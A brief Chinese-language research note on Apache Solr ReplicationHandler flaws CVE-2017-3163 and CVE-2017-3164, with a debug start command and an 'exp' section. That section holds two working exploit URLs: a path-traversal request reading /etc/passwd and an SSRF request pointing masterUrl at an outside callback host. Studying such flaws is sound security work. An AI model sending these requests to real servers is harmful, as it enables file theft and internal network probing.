https://xz.aliyun.com/t/8374
Solr的ReplicationHandler类对输入数据数据处理不当,存在任意文件读取和服务器请求伪造漏洞,涉及漏洞编号为CVE-2017-3163和CVE-2017-3164
有几点感受
1 ant构建实在是太慢了,挂了代理也慢,主要时间不是花在下载上,而是resolve
2 结合idea进行调试的命令
./solr start -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=6666" -p 8983 -s "/Users/rai4over/Desktop/solr-6.0.0/solr/example/example-DIH/solr"
3 跟了下程序,感觉前面过于啰嗦,直接断在解析命令跟进不同函数看即可
exp
读文件
http://127.0.0.1:8983/solr/db/replication?command=filecontent&file=../../../../../../../../../../../../../etc/passwd&wt=filestream&generation=1
ssrf
http://127.0.0.1:8983/solr/db/replication?command=fetchindex&masterUrl=http://f422cd57.y7z.xyz/xxxx&wt=json&httpBasicAuthUser=aaa&httpBasicAuthPassword=bbb